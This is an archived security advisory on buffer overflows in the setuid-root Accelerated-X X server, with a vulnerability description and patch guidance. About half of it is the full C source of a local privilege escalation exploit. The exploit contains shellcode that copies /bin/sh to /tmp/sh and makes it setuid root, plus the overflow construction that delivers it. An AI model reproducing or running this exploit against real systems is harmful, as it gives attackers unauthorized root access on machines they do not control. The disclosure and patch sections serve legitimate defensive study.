|
Vulnerability Accelerated-X Affected Unices (Linux, FreeBSD, Solaris/x86, SCO) Description Following is based on KSR[T] Advisory #011. Local users can gain administrative privileges by exploiting multiple buffer overflows (stack overwrites) in the Accelerated-X X server. Accelerated-X Server is a commercial X server available from http://www.xig.com/. By default, the X server is installed setuid root so that when it is executed by a user it still retains enough privilege to load drivers, manipulate the display, and log information. However, due to insufficient bounds checking on command-line parameters, an attacker can overflow the X server by specifying a 48 byte display string, or through a long string passed into the -query command line parameter. Local users that can execute the Accelerated-X Xserver can obtain root privileges. (KSR[T] would like to thank Chris Evans for pointing out the -query buffer overflow as well as additional security holes relating to command line parameters) Here is the exploit for the Accelerate-X buffer overflow. c0nd0r checked the '-query' argument and found out that it will not overwrite the return address thus not allowing the exploitation. The argument '-indirect' behaves in the same way. /* * SDI linux exploit for Accelerate-X * Sekure SDI - Brazilian Information Security Team * by c0nd0r <condor@sekure.org> * * This script will exploit a vulnerability found by KSRT team * in the Accelerate-X Xserver [<=5.0]. * * -------------------------------------------------------------------- * The vulnerable buffer was small so we've changed the usual order to: * [garbage][eip][lots nop][shellcode] * BTW, I've also changed the code to execute, it will create a setuid * shell owned by the superuser at /tmp/sh. * -------------------------------------------------------------------- * * Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no * responsability. * * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia, * marty (NORDO!), vader, fcon, slide, c_orb and * specially to my sasazita. Also toxyn.org, pulhas.org, * superbofh.org (Phibernet rox) and el8.org. * * Laughs - lame guys who hacked the senado/planalto.gov.br * pay some attention to the site: securityfocus.com (good point). * see you at #uground (irc.brasnet.org) */ #include <stdio.h> /* generic shellcode */ char shellcode[] = "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36" "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88" "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3" "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xca\xff\xff\xff" "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh"; main ( int argc, char *argv[] ) { char buf[1024]; int x, y, offset=1000; long addr; int joe; if (argc > 1) offset = atoi ( argv[1]); /* return address */ addr = (long) &joe + offset; buf[0] = ':'; for ( x = 1; x < 53; x++) buf[x] = 'X'; buf[x++] = (addr & 0x000000ff); buf[x++] = (addr & 0x0000ff00) >> 8; buf[x++] = (addr & 0x00ff0000) >> 16; buf[x++] = (addr & 0xff000000) >> 24; for ( ; x < 500; x++) buf[x] = 0x90; for ( y = 0; y < strlen(shellcode); y++, x++) buf[x] = shellcode[y]; fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%x\n\n", offset, addr); buf[strlen(buf)] = '\0'; execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0); // setenv ( "EGG", buf, 1); // system ( "/bin/sh"); } Solution For AccelX 5.x: XiG has made a patch available for 5.0.1 which corrects these and other potential command line interface security holes. Users running 5.0.0 have to apply the 5.0.1 patch prior to applying the 5.0.2 patch. The patch is available at ftp://ftp.xig.com/pub/updates. For AccelX 4.x: Patch will be made available shortly. An interim solution is to use an X server wrapper, or to limit access to the Xaccel binary via a special group. The upcoming release of Maximum CDE 2.1 comes with the 5.0.2 X Server, and is not vulnerable to these attacks.